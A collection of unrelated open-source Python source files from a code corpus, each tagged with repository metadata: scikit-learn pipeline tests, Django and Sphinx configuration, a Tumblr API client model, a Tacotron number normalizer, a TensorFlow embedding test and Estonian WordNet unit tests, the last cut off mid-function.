X_trans2 = pipeline.fit_transform(X)
X_trans3 = pca.fit_transform(X)
assert_array_almost_equal(X_trans, X_trans2)
assert_array_almost_equal(X_trans, X_trans3)
X_back = pipeline.inverse_transform(X_trans)
X_back2 = pca.inverse_transform(X_trans)
assert_array_almost_equal(X_back, X_back2)
def test_pipeline_fit_transform():
# Test whether pipeline works with a transformer missing fit_transform
iris = load_iris()
X = iris.data
y = iris.target
transf = Transf()
pipeline = Pipeline([('mock', transf)])
# test fit_transform:
X_trans = pipeline.fit_transform(X, y)
X_trans2 = transf.fit(X, y).transform(X)
assert_array_almost_equal(X_trans, X_trans2)
def test_set_pipeline_steps():
transf1 = Transf()
transf2 = Transf()
pipeline = Pipeline([('mock', transf1)])
assert_true(pipeline.named_steps['mock'] is transf1)
# Directly setting attr
pipeline.steps = [('mock2', transf2)]
assert_true('mock' not in pipeline.named_steps)
assert_true(pipeline.named_steps['mock2'] is transf2)
assert_equal([('mock2', transf2)], pipeline.steps)
# Using set_params
pipeline.set_params(steps=[('mock', transf1)])
assert_equal([('mock', transf1)], pipeline.steps)
# Using set_params to replace single step
pipeline.set_params(mock=transf2)
assert_equal([('mock', transf2)], pipeline.steps)
# With invalid data
pipeline.set_params(steps=[('junk', ())])
assert_raises(TypeError, pipeline.fit, [[1]], [1])
assert_raises(TypeError, pipeline.fit_transform, [[1]], [1])
def test_set_pipeline_step_none():
# Test setting Pipeline steps to None
X = np.array([[1]])
y = np.array([1])
mult2 = Mult(mult=2)
mult3 = Mult(mult=3)
mult5 = Mult(mult=5)
def make():
return Pipeline([('m2', mult2), ('m3', mult3), ('last', mult5)])
pipeline = make()
exp = 2 * 3 * 5
assert_array_equal([[exp]], pipeline.fit_transform(X, y))
assert_array_equal([exp], pipeline.fit(X).predict(X))
assert_array_equal(X, pipeline.inverse_transform([[exp]]))
pipeline.set_params(m3=None)
exp = 2 * 5
assert_array_equal([[exp]], pipeline.fit_transform(X, y))
assert_array_equal([exp], pipeline.fit(X).predict(X))
assert_array_equal(X, pipeline.inverse_transform([[exp]]))
assert_dict_equal(pipeline.get_params(deep=True),
{'steps': pipeline.steps,
'm2': mult2,
'm3': None,
'last': mult5,
'm2__mult': 2,
'last__mult': 5,
})
pipeline.set_params(m2=None)
exp = 5
assert_array_equal([[exp]], pipeline.fit_transform(X, y))
assert_array_equal([exp], pipeline.fit(X).predict(X))
assert_array_equal(X, pipeline.inverse_transform([[exp]]))
# for other methods, ensure no AttributeErrors on None:
other_methods = ['predict_proba', 'predict_log_proba',
'decision_function', 'transform', 'score']
for method in other_methods:
getattr(pipeline, method)(X)
pipeline.set_params(m2=mult2)
exp = 2 * 5
assert_array_equal([[exp]], pipeline.fit_transform(X, y))
assert_array_equal([exp], pipeline.fit(X).predict(X))
assert_array_equal(X, pipeline.inverse_transform([[exp]]))
pipeline = make()
pipeline.set_params(last=None)
# mult2 and mult3 are active
exp = 6
assert_array_equal([[exp]], pipeline.fit(X, y).transform(X))
assert_array_equal([[exp]], pipeline.fit_transform(X, y))
assert_array_equal(X, pipeline.inverse_transform([[exp]]))
assert_raise_message(AttributeError,
"'NoneType' object has no attribute 'predict'",
getattr, pipeline, 'predict')
# Check None step at construction time
exp = 2 * 5
pipeline = Pipeline([('m2', mult2), ('m3', None), ('last', mult5)])
assert_array_equal([[exp]], pipeline.fit_transform(X, y))
assert_array_equal([exp], pipeline.fit(X).predict(X))
assert_array_equal(X, pipeline.inverse_transform([[exp]]))
def test_pipeline_ducktyping():
pipeline = make_pipeline(Mult(5))
pipeline.predict
pipeline.transform
pipeline.inverse_transform
pipeline = make_pipeline(Transf())
assert_false(hasattr(pipeline, 'predict'))
pipeline.transform
pipeline.inverse_transform
pipeline = make_pipeline(None)
assert_false(hasattr(pipeline, 'predict'))
pipeline.transform
pipeline.inverse_transform
pipeline = make_pipeline(Transf(), NoInvTransf())
assert_false(hasattr(pipeline, 'predict'))
pipeline.transform
assert_false(hasattr(pipeline, 'inverse_transform'))
pipeline = make_pipeline(NoInvTransf(), Transf())
assert_false(hasattr(pipeline, 'predict'))
pipeline.transform
assert_false(hasattr(pipeline, 'inverse_transform'))
def test_make_pipeline():
t1 = Transf()
t2 = Transf()
pipe = make_pipeline(t1, t2)
assert_true(isinstance(pipe, Pipeline))
assert_equal(pipe.steps[0][0], "transf-1")
assert_equal(pipe.steps[1][0], "transf-2")
pipe = make_pipeline(t1, t2, FitParamT())
assert_true(isinstance(pipe, Pipeline))
assert_equal(pipe.steps[0][0], "transf-1")
assert_equal(pipe.steps[1][0], "transf-2")
assert_equal(pipe.steps[2][0], "fitparamt")
def test_feature_union_weights():
# test feature union with transformer weights
iris = load_iris()
X = iris.data
y = iris.target
pca = PCA(n_components=2, svd_solver='randomized', random_state=0)
select = SelectKBest(k=1)
# test using fit followed by transform
fs = FeatureUnion([("pca", pca), ("select", select)],
transformer_weights={"pca": 10})
fs.fit(X, y)
X_transformed = fs.transform(X)
# test using fit_transform
fs = FeatureUnion([("pca", pca), ("select", select)],
transformer_weights={"pca": 10})
X_fit_transformed = fs.fit_transform(X, y)
# test it works with transformers missing fit_transform
fs = FeatureUnion([("mock", Transf()), ("pca", pca), ("select", select)],
transformer_weights={"mock": 10})
X_fit_transformed_wo_method = fs.fit_transform(X, y)
# check against expected result
# We use a different pca object to control the random_state stream
assert_array_almost_equal(X_transformed[:, :-1], 10 * pca.fit_transform(X))
assert_array_equal(X_transformed[:, -1],
select.fit_transform(X, y).ravel())
assert_array_almost_equal(X_fit_transformed[:, :-1],
10 * pca.fit_transform(X))
assert_array_equal(X_fit_transformed[:, -1],
select.fit_transform(X, y).ravel())
assert_equal(X_fit_transformed_wo_method.shape, (X.shape[0], 7))
def test_feature_union_parallel():
# test that n_jobs work for FeatureUnion
X = JUNK_FOOD_DOCS
fs = FeatureUnion([
("words", CountVectorizer(analyzer='word')),
("chars", CountVectorizer(analyzer='char')),
])
fs_parallel = FeatureUnion([
("words", CountVectorizer(analyzer='word')),
("chars", CountVectorizer(analyzer='char')),
], n_jobs=2)
fs_parallel2 = FeatureUnion([
("words", CountVectorizer(analyzer='word')),
("chars", CountVectorizer(analyzer='char')),
], n_jobs=2)
fs.fit(X)
X_transformed = fs.transform(X)
assert_equal(X_transformed.shape[0], len(X))
fs_parallel.fit(X)
X_transformed_parallel = fs_parallel.transform(X)
assert_equal(X_transformed.shape, X_transformed_parallel.shape)
assert_array_equal(
X_transformed.toarray(),
X_transformed_parallel.toarray()
)
# fit_transform should behave the same
X_transformed_parallel2 = fs_parallel2.fit_transform(X)
assert_array_equal(
X_transformed.toarray(),
X_transformed_parallel2.toarray()
)
# transformers should stay fit after fit_transform
X_transformed_parallel2 = fs_parallel2.transform(X)
assert_array_equal(
X_transformed.toarray(),
X_transformed_parallel2.toarray()
)
def test_feature_union_feature_names():
word_vect = CountVectorizer(analyzer="word")
char_vect = CountVectorizer(analyzer="char_wb", ngram_range=(3, 3))
ft = FeatureUnion([("chars", char_vect), ("words", word_vect)])
ft.fit(JUNK_FOOD_DOCS)
feature_names = ft.get_feature_names()
for feat in feature_names:
assert_true("chars__" in feat or "words__" in feat)
assert_equal(len(feature_names), 35)
ft = FeatureUnion([("tr1", Transf())]).fit([[1]])
assert_raise_message(AttributeError,
'Transformer tr1 (type Transf) does not provide '
'get_feature_names', ft.get_feature_names)
def test_classes_property():
iris = load_iris()
X = iris.data
y = iris.target
reg = make_pipeline(SelectKBest(k=1), LinearRegression())
reg.fit(X, y)
assert_raises(AttributeError, getattr, reg, "classes_")
clf = make_pipeline(SelectKBest(k=1), LogisticRegression(random_state=0))
assert_raises(AttributeError, getattr, clf, "classes_")
clf.fit(X, y)
assert_array_equal(clf.classes_, np.unique(y))
def test_X1d_inverse_transform():
transformer = Transf()
pipeline = make_pipeline(transformer)
X = np.ones(10)
msg = "1d X will not be reshaped in pipeline.inverse_transform"
assert_warns_message(FutureWarning, msg, pipeline.inverse_transform, X)
def test_set_feature_union_steps():
mult2 = Mult(2)
mult2.get_feature_names = lambda: ['x2']
mult3 = Mult(3)
mult3.get_feature_names = lambda: ['x3']
mult5 = Mult(5)
mult5.get_feature_names = lambda: ['x5']
ft = FeatureUnion([('m2', mult2), ('m3', mult3)])
assert_array_equal([[2, 3]], ft.transform(np.asarray([[1]])))
assert_equal(['m2__x2', 'm3__x3'], ft.get_feature_names())
# Directly setting attr
ft.transformer_list = [('m5', mult5)]
assert_array_equal([[5]], ft.transform(np.asarray([[1]])))
assert_equal(['m5__x5'], ft.get_feature_names())
# Using set_params
ft.set_params(transformer_list=[('mock', mult3)])
assert_array_equal([[3]], ft.transform(np.asarray([[1]])))
assert_equal(['mock__x3'], ft.get_feature_names())
# Using set_params to replace single step
ft.set_params(mock=mult5)
assert_array_equal([[5]], ft.transform(np.asarray([[1]])))
assert_equal(['mock__x5'], ft.get_feature_names())
def test_set_feature_union_step_none():
mult2 = Mult(2)
mult2.get_feature_names = lambda: ['x2']
mult3 = Mult(3)
mult3.get_feature_names = lambda: ['x3']
X = np.asarray([[1]])
ft = FeatureUnion([('m2', mult2), ('m3', mult3)])
assert_array_equal([[2, 3]], ft.fit(X).transform(X))
assert_array_equal([[2, 3]], ft.fit_transform(X))
assert_equal(['m2__x2', 'm3__x3'], ft.get_feature_names())
ft.set_params(m2=None)
assert_array_equal([[3]], ft.fit(X).transform(X))
assert_array_equal([[3]], ft.fit_transform(X))
assert_equal(['m3__x3'], ft.get_feature_names())
ft.set_params(m3=None)
assert_array_equal([[]], ft.fit(X).transform(X))
assert_array_equal([[]], ft.fit_transform(X))
assert_equal([], ft.get_feature_names())
# check we can change back
ft.set_params(m3=mult3)
assert_array_equal([[3]], ft.fit(X).transform(X))
def test_step_name_validation():
bad_steps1 = [('a__q', Mult(2)), ('b', Mult(3))]
bad_steps2 = [('a', Mult(2)), ('a', Mult(3))]
for cls, param in [(Pipeline, 'steps'),
(FeatureUnion, 'transformer_list')]:
# we validate in construction (despite scikit-learn convention)
bad_steps3 = [('a', Mult(2)), (param, Mult(3))]
for bad_steps, message in [
(bad_steps1, "Step names must not contain __: got ['a__q']"),
(bad_steps2, "Names provided are not unique: ['a', 'a']"),
(bad_steps3, "Step names conflict with constructor "
"arguments: ['%s']" % param),
]:
# three ways to make invalid:
# - construction
assert_raise_message(ValueError, message, cls,
**{param: bad_steps})
# - setattr
est = cls(**{param: [('a', Mult(1))]})
setattr(est, param, bad_steps)
assert_raise_message(ValueError, message, est.fit, [[1]], [1])
assert_raise_message(ValueError, message, est.fit_transform,
[[1]], [1])
# - set_params
est = cls(**{param: [('a', Mult(1))]})
est.set_params(**{param: bad_steps})
assert_raise_message(ValueError, message, est.fit, [[1]], [1])
assert_raise_message(ValueError, message, est.fit_transform,
[[1]], [1])
| potash/scikit-learn | sklearn/tests/test_pipeline.py | Python | bsd-3-clause | 24,571 |
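# Editor's note: a compact usage sketch of the '<step>__<param>' routing convention
# exercised by the tests above (assumes a scikit-learn version contemporary with
# this test file).
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC
pipe = make_pipeline(StandardScaler(), SVC())
# make_pipeline names each step after its lowercased class name.
assert pipe.steps[0][0] == 'standardscaler'
pipe.set_params(svc__C=10.0)                 # route the C parameter to the 'svc' step
assert pipe.named_steps['svc'].C == 10.0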
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('timeslot_lottery.urls')),
)
| Velmont/django-timeslot-lottery | example/example/urls.py | Python | gpl-3.0 | 211 |
# -*- coding: utf-8 -*-
# Copyright (c) 2010 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Keystone documentation build configuration file, created by
# sphinx-quickstart on Tue May 18 13:50:15 2010.
#
# This file is execfile()'d with the current directory set to its containing
# dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.abspath(os.path.join(BASE_DIR, "..", ".."))
sys.path.insert(0, ROOT_DIR)
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.ifconfig',
'sphinx.ext.graphviz',
'sphinx.ext.todo',
'oslo_config.sphinxext',
'oslo_config.sphinxconfiggen',
'oslo_policy.sphinxext',
'oslo_policy.sphinxpolicygen',
'openstackdocstheme',]
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = []
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Neutron VPNaaS'
copyright = u'2011-present, OpenStack Foundation.'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
# unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['neutron_vpnaas.']
# -- Options for man page output --------------------------------------------
# Grouping the document tree for man pages.
# List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual'
#man_pages = [
# ('man/neutron-server', 'neutron-server', u'Neutron Server',
# [u'OpenStack'], 1)
#]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
html_theme = 'openstackdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
#htmlhelp_basename = 'neutrondoc'
# -- Options for LaTeX output ------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author,
# documentclass [howto/manual]).
latex_documents = [
('index', 'doc-neutron-vpnaas.tex', u'Neutron VPN-as-a-Service Documentation',
u'Neutron development team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Disable usage of xindy https://bugzilla.redhat.com/show_bug.cgi?id=1643664
latex_use_xindy = False
latex_domain_indices = False
latex_elements = {
'extraclassoptions': 'openany,oneside',
'makeindex': '',
'printindex': '',
'preamble': r'\setcounter{tocdepth}{3}',
}
# -- Options for openstackdocstheme -------------------------------------------
openstackdocs_repo_name = 'openstack/neutron-vpnaas'
openstackdocs_pdf_link = True
openstackdocs_auto_name = False
openstackdocs_bug_project = 'neutron'
openstackdocs_bug_tag = 'doc'
# -- Options for oslo_config.sphinxconfiggen ---------------------------------
_config_generator_config_files = [
'vpn_agent.ini',
'neutron_vpnaas.conf',
]
def _get_config_generator_config_definition(conf):
config_file_path = '../../etc/oslo-config-generator/%s' % conf
# oslo_config.sphinxconfiggen appends '.conf.sample' to the filename,
    # strip the file extension (.conf or .ini).
output_file_path = '_static/config_samples/%s' % conf.rsplit('.', 1)[0]
return (config_file_path, output_file_path)
config_generator_config_file = [
_get_config_generator_config_definition(conf)
for conf in _config_generator_config_files
]
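# For example, 'vpn_agent.ini' above yields the pair
# ('../../etc/oslo-config-generator/vpn_agent.ini', '_static/config_samples/vpn_agent').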
# -- Options for oslo_policy.sphinxpolicygen ---------------------------------
policy_generator_config_file = '../../etc/oslo-policy-generator/policy.conf'
sample_policy_basename = '_static/neutron-vpnaas'
| openstack/neutron-vpnaas | doc/source/conf.py | Python | apache-2.0 | 8,813 |
"""
WSGI config for wawhfd project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "wawhfd.settings")
application = get_wsgi_application()
| calebrash/wawhfd | wawhfd/wsgi.py | Python | mit | 390 |
import os
from AbstractRootModel import AbstractRootModel
import pytumblr
import PostModel
from Settings import Settings
class BlogModel(AbstractRootModel):
def __init__(self, account):
self.client = pytumblr.TumblrRestClient(Settings.OAUTH_CONSUMER, Settings.SECRET)
self.account = account
blog_info = self.client.posts(self.account)
if blog_info.has_key('meta') and blog_info['meta']['status'] != 200:
raise Exception("Unable to connect to Tumblr API. Did you fill in your API OAUTH/SECRET in Settings.py?")
self.name = blog_info['blog']['title']
self.num_posts = blog_info['total_posts']
self.loaded = set()
print "Created model for blog " + self.getName()
""" Overrides AbstractRootModel """
def getName(self):
return self.name
""" Overrides AbstractRootModel """
def getRootPath(self):
return self.account
""" Overrides AbstractRootModel """
def getInfo(self):
info = {}
info['general_desc'] = 'Displaying a Tumblr!'
info['blog_name'] = self.name
return info
def getInfoTemplatePath(self):
return os.path.join('templates','blogInfo.html')
def getNumPosts(self):
return self.num_posts
def getPosts(self, start=0, end=19, types=['photo', 'video']):
n = 0
N = (end + 1) - start
# print "Getting posts. Start idx %d, end idx %d" % (start, end)
posts = []
i = 0
while n < N:
grab = min(N - n, 20)
ps = self.client.posts(self.account, limit=grab, offset= (start + i))
for p in ps['posts']:
if p['type'] in types:
if p['id'] in self.loaded:
# print "DUPE! " + str(p['id'])
continue
self.loaded.add(p['id'])
# print 'post of type ' + p['type'] + '\tid: ' + str(p['id'])
posts.append(PostModel.makePostModel(p))
n += 1
i += 1
post_types = {}
for post in posts:
if not post_types.has_key(post.post_type):
post_types[post.post_type] = 0
post_types[post.post_type] += 1
print 'Retrieved %d posts from %s %s' % (len(posts), self.getName(), str(post_types))
return posts, start + i | bpeck/tumblr-display | src/models/BlogModel.py | Python | apache-2.0 | 2,405 |
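# Editor's note: illustrative use of the BlogModel class above. It needs valid
# Tumblr OAuth keys in Settings.py plus network access, so the sketch is left
# commented out; the account name is a placeholder.
# blog = BlogModel('staff.tumblr.com')
# posts, next_offset = blog.getPosts(start=0, end=19, types=['photo'])
# print '%s: fetched %d of %d posts' % (blog.getName(), len(posts), blog.getNumPosts())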
import inflect
import re
_inflect = inflect.engine()
_comma_number_re = re.compile(r'([0-9][0-9\,]+[0-9])')
_decimal_number_re = re.compile(r'([0-9]+\.[0-9]+)')
_pounds_re = re.compile(r'£([0-9\,]*[0-9]+)')
_dollars_re = re.compile(r'\$([0-9\.\,]*[0-9]+)')
_ordinal_re = re.compile(r'[0-9]+(st|nd|rd|th)')
_number_re = re.compile(r'[0-9]+')
def _remove_commas(m):
return m.group(1).replace(',', '')
def _expand_decimal_point(m):
return m.group(1).replace('.', ' point ')
def _expand_dollars(m):
match = m.group(1)
parts = match.split('.')
if len(parts) > 2:
return match + ' dollars' # Unexpected format
dollars = int(parts[0]) if parts[0] else 0
cents = int(parts[1]) if len(parts) > 1 and parts[1] else 0
if dollars and cents:
dollar_unit = 'dollar' if dollars == 1 else 'dollars'
cent_unit = 'cent' if cents == 1 else 'cents'
return '%s %s, %s %s' % (dollars, dollar_unit, cents, cent_unit)
elif dollars:
dollar_unit = 'dollar' if dollars == 1 else 'dollars'
return '%s %s' % (dollars, dollar_unit)
elif cents:
cent_unit = 'cent' if cents == 1 else 'cents'
return '%s %s' % (cents, cent_unit)
else:
return 'zero dollars'
def _expand_ordinal(m):
return _inflect.number_to_words(m.group(0))
def _expand_number(m):
num = int(m.group(0))
if num > 1000 and num < 3000:
if num == 2000:
return 'two thousand'
elif num > 2000 and num < 2010:
return 'two thousand ' + _inflect.number_to_words(num % 100)
elif num % 100 == 0:
return _inflect.number_to_words(num // 100) + ' hundred'
else:
return _inflect.number_to_words(num, andword='', zero='oh', group=2).replace(', ', ' ')
else:
return _inflect.number_to_words(num, andword='')
def normalize_numbers(text):
text = re.sub(_comma_number_re, _remove_commas, text)
text = re.sub(_pounds_re, r'\1 pounds', text)
text = re.sub(_dollars_re, _expand_dollars, text)
text = re.sub(_decimal_number_re, _expand_decimal_point, text)
text = re.sub(_ordinal_re, _expand_ordinal, text)
text = re.sub(_number_re, _expand_number, text)
return text
| keithito/tacotron | text/numbers.py | Python | mit | 2,117 |
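# Editor's note: an illustrative sketch of normalize_numbers from text/numbers.py
# above (assumes the module is importable as text.numbers; the expansions follow
# the inflect-based rules shown there).
from text.numbers import normalize_numbers
print(normalize_numbers('I owe $3.50 for 2 books'))
# -> 'I owe three dollars, fifty cents for two books'
print(normalize_numbers('born in 1906, seated in row 15'))
# -> 'born in nineteen oh six, seated in row fifteen'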
from rest_framework import routers
from . import views
router = routers.DefaultRouter(trailing_slash=False)
router.register(r'complaints', views.ComplaintViewSet)
urlpatterns = router.urls
| danjac/ownblock | ownblock/ownblock/apps/complaints/urls.py | Python | mit | 192 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.embedding_ops."""
import numpy as np
from tensorflow.python.eager import def_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import googletest
@test_util.run_all_in_graph_and_eager_modes
class EmbeddingLookupTest(test_util.TensorFlowTestCase):
def testEmbeddingLookupOnUninitializedVariableDoesSparseRead(self):
x = resource_variable_ops.UninitializedVariable(
trainable=True, shape=[3, 3], dtype=dtypes.float32)
@def_function.function(input_signature=[])
def _init():
return x.assign(np.zeros([3, 3]))
@def_function.function(input_signature=[])
def _call():
return embedding_ops.embedding_lookup_v2(x, [0])
self.assertAllClose(self.evaluate(_init()), np.zeros([3, 3]))
concrete_call = _call.get_concrete_function()
self.assertAllClose(self.evaluate(concrete_call()), [[0., 0., 0.]])
resource_gather_node = []
read_var_node = []
graph = concrete_call.graph.as_graph_def()
for n in graph.node:
if n.op == "ResourceGather":
resource_gather_node.append(n)
if n.op == "ReadVariableOp":
read_var_node.append(n)
for f in graph.library.function:
for n in f.node_def:
if n.op == "ResourceGather":
resource_gather_node.append(n)
if n.op == "ReadVariableOp":
read_var_node.append(n)
# There should be a single ResourceGather, but no ReadVariableOp
# (dense read).
self.assertLen(resource_gather_node, 1)
self.assertLen(read_var_node, 0)
if __name__ == "__main__":
googletest.main()
| annarev/tensorflow | tensorflow/python/ops/embedding_ops_test.py | Python | apache-2.0 | 2,458 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
"""
Notes
----
Tests must be updated if wordnet file changes. Tests made for wordnet version kb69-a.
"""
import unittest
import sys, os
from ..wordnet import wn, eurown
class InternalSynsetOffsetQueryTest(unittest.TestCase):
def test_empty_query(self):
self.assertListEqual(wn._get_synset_offsets([]),[])
def test_multiple_single_element_queries(self):
idx_offset_pairs = [(1,111),(4967,12606307),(12672,26079737),(34800,58069170),(65518,91684951)]
for i in range(len(idx_offset_pairs)):
self.assertListEqual(wn._get_synset_offsets([idx_offset_pairs[i][0]]),[idx_offset_pairs[i][1]])
def test_ordered_multiple_element_query(self):
idx_offset_pairs = [(7,20473),(5421,13372490),(21450,39305206),(41785,66707187)]
self.assertListEqual(wn._get_synset_offsets([idx_offset_pair[0] for idx_offset_pair in idx_offset_pairs]),[idx_offset_pair[1] for idx_offset_pair in idx_offset_pairs])
def test_unordered_multiple_element_query(self):
idx_offset_pairs = [(21450,39305206),(5421,13372490),(7,20473),(41785,66707187)]
result = wn._get_synset_offsets([idx_offset_pair[0] for idx_offset_pair in idx_offset_pairs])
self.assertTrue(all(offset in result for offset in [idx_offset_pair[1] for idx_offset_pair in idx_offset_pairs]))
class SynsetKeyTest(unittest.TestCase):
def test_key_derivation(self):
lit,pos,sense = "test",'n',7
variant = eurown.Variant(literal=lit,sense=sense)
variants = eurown.Variants()
variants.append(variant)
raw_synset = eurown.Synset(pos=pos, variants=variants)
self.assertEqual(wn._get_key_from_raw_synset(raw_synset),"%s.%s.%02d"%(lit,pos,sense))
class InternalSynsetQuery(unittest.TestCase):
def test_empty_query(self):
self.assertListEqual(wn._get_synsets([]),[])
def test_single_element_query(self):
synset_id,synset_offset,literal,pos,sense = 6,16983,'mõjutamine','n',2
# todo: instead of comparing string representation, compare
# literal, pos and sense variables directly
self.assertEqual(wn._get_synsets([synset_offset])[0].id,synset_id)
"""
class SynsetQuery(unittest.TestCase):
def test_synset_query(self):
synset_id,synset_offset,literal,pos,sense = 6,16983,'mõjutamine','n',2
synset_key = "%s.%s.%02d"%(literal,pos,sense)
synset = wn.synset(synset_key)
self.assertEqual(synset.id, synset_id)
self.assertEqual(synset.name, synset_key)
"""
class SynsetsQuery(unittest.TestCase):
def test_synsets_query(self):
literal = 'aju'
synset_ids = (10433,10434,12095,44798)
self.assertTrue(all(synset.id in synset_ids for synset in wn.synsets(literal)))
class AllSynsetsQuery(unittest.TestCase):
pass
#def test_all_adverbs_query(self):
#self.assertEqual(len(wn.all_synsets('b')),2244)
#def test_all_adjectives_query(self):
#self.assertEqual(len(wn.all_synsets('a')),3076)
#def test_all_verbs_query(self):
#self.assertEqual(len(wn.all_synsets('v')),5748)
#def test_all_nouns_query(self):
#self.assertEqual(len(wn.all_synsets('n')),54449)
class LemmaQuery(unittest.TestCase):
def test_lemma_query(self):
lemma_key = "kolask.n.01.elevant"
self.assertTrue(wn.lemma(lemma_key).name,"elevant")
class AllLemmasQuery(unittest.TestCase):
def test_all_lemmas_query(self):
result = wn.lemmas("kiiresti")
        self.assertEqual(len(result), 1)
        self.assertEqual(result[0].name, "kiiresti")
class MorphyTest(unittest.TestCase):
def test_morphy(self):
self.assertTrue(wn.morphy("karud"),"karu")
class Synset(unittest.TestCase):
def test_get_related_synsets(self):
ahel_synset = wn.synset("ahel.n.02")
hyperonyms = ahel_synset.get_related_synsets('has_hyperonym')
self.assertEqual(hyperonyms[0].name,'rida.n.01')
hyponyms = ahel_synset.get_related_synsets('has_hyponym')
self.assertEqual(hyponyms[0].name,'põhjusahel.n.01')
self.assertEqual(hyponyms[1].name,'mäeahelik.n.01')
def test_closure(self):
real_ancestor_hyperonyms = [(293,'vahend.n.02'),(248,'asi.n.04'),(693,'objekt.n.01'),(8787,'olev.n.02')]
real_ancestor_ids = [id_name[0] for id_name in real_ancestor_hyperonyms]
hoob_synset = wn.synset("hoob.n.01")
ancestor_hyperonyms = hoob_synset.closure('has_hyperonym')
self.assertEqual(len(ancestor_hyperonyms),len(real_ancestor_hyperonyms))
self.assertTrue(all(ancestor.id in real_ancestor_ids for ancestor in ancestor_hyperonyms))
def test_closure_with_custom_depth(self):
real_ancestor_hyperonyms = [(293,'vahend.n.02')]
real_ancestor_ids = [id_name[0] for id_name in real_ancestor_hyperonyms]
hoob_synset = wn.synset("hoob.n.01")
